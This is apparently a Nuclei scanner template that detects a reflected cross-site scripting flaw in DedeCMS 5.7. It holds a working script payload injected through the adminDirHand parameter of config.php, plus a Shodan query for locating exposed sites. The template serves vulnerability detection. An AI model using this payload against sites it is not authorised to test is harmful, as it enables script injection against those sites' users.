id: dedecms-config-xss

info:
  name: DedeCMS 5.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://www.zilyun.com/8665.html
    - https://www.60ru.com/161.html
    - https://www.cnblogs.com/milantgh/p/3615853.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"DedeCms"
  tags: dedecms,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "location='../../</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a0047304502206e07847ca9794c0bb28e7f6813a718ded8a675de71740a59b149bdca1b9091e3022100cdb076d95f5cf5f8c72abba312c332a18d5325d48ecf95e2c4f5aa9936247834:922c64590222798bb761d5b6d8e72950
